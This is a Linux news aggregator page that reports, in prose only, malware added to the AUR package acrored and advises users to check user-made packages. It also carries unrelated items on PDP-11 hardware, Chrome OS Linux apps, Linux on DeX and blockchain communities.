Language Selection

English French German Italian Portuguese Spanish

Malware Found On The Arch User Repository (AUR)

Filed under
Security

On June 7, an AUR package was modified with some malicious code, reminding Arch Linux users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.

AUR, or the Arch (Linux) User Repository contains package descriptions, also known as PKGBUILDs, which make compiling packages from source easier. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."

The discovery of an AUR package containing malicious code proves this. acrored was modified on June 7 (it appears it was previously "orphaned", meaning it had no maintainer) by an user named "xeactor" to include a curl command that downloaded a script from a pastebin. The script then downloaded another script and installed a systemd unit to run that script periodically.

Read more

Also: Security updates for Monday

More in Tux Machines

Android Leftovers

Security Leftovers

Devices: Adding Linux to A PDP-11, Adding GNU/Linux Software to Chrome OS, and Adding Ubuntu to Android

  • Adding Linux To A PDP-11
    The UNIBUS architecture for DEC’s PDPs and Vaxxen was a stroke of genius. If you wanted more memory in your minicomputer, just add another card. Need a drive? Plug it into the backplane. Of course, with all those weird cards, these old UNIBUS PDPs are hard to keep running. The UniBone is the solution to this problem. It puts Linux on a UNIBUS bridge, allowing this card to serve as a memory emulator, a test console, a disk emulator, or any other hardware you can think of. The key to this build is the BeagleBone, everyone’s second-favorite single board computer that has one feature the other one doesn’t: PRUs, or a programmable real-time unit, that allows you to blink a lot of pins very, very fast. We’ve seen the BeagleBone be used as Linux in a terminal, as the rest of the computer for an old PDP-10 front panel and as the front end for a PDP-11/03.
  • Chrome OS Linux apps will soon be able to access your entire Downloads folder and Google Drive
    Google is working hard to turn Chrome OS into more than just a browser, but a real, functional operating system for consumers of all kinds. Most recently, they’ve invited developers to the platform with Linux app support that enables all of their tools, including Android Studio, to work as expected. Soon, your Chrome OS and Google Drive files will be even more accessible to your Linux apps. [...] According to a new commit on the Chromium Gerrit, that’s all about to change. The commit primarily pertains to a new dialog that will be shown when sharing ‘root’ folders like My Drive or Downloads with your Chrome OS Linux apps (internally known as Crostini) container. The dialog is intended to forewarn you that sharing a root folder is a bit more serious than just sharing a sub-folder, and to be sure you know what you’re doing.
  • Samsung Note 9 and Tab S4 owners can run a full Ubuntu Desktop – Linux on Dex
    We have come a long way as an industry and if this is not one of the biggest milestones in personal computing, I don’t know what else qualifies. Over the past decade of smartphones being around, we have seen an exponential increase in the power that our smartphones pack. I mean, flagships from the past few years spot more RAM and processing power than most laptops out there, but the small form factor has always been a hindrance to the utilization of this power. I mean you can only do so much on a 5.5-inch display. Samsung has launched its “Linux on Dex” app in beta and is inviting geeks and tinkerers to register and help test and develop it. The app lets owners of specific Samsung devices “run” a full Ubuntu desktop on their device alongside Android.

What blockchain can learn from open source

Over the 10+ years I've been involved with open source, I've been part of small projects with innovative ideas that grew into large projects with solid communities. I've also witnessed the way dysfunctional communities can suck the energy from projects. I've also recently become active in blockchain by writing and contributing to projects. I've noticed that blockchain projects are like startups with open development and open business models. Therefore, to be successful, blockchain startups must learn how to build communities the open source way. Read more